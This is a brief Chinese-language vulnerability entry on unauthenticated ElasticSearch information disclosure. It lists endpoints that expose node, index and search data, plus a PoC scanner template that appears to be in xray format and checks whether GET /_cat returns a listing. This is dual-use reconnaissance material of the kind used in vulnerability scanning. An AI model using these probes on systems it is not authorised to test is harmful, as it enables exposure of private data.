漏洞描述
/_nodes #查看节点数据
/_cat/indices #索引
_cat/indices
/_plugin/head
/_nodes/
/_status
/_search?pretty
elasticsearch-unauth: ElasticSearch Information Disclosure
PoC代码[已公开]
id: elasticsearch-unauth
info:
name: ElasticSearch Information Disclosure
author: p0wd3r
severity: high
verified: true
description: |
/_nodes #查看节点数据
/_cat/indices #索引
_cat/indices
/_plugin/head
/_nodes/
/_status
/_search?pretty
rules:
r0:
request:
method: GET
path: /_cat
expression: response.status == 200 && response.body.bcontains(b"/_cat/master")
expression: r0()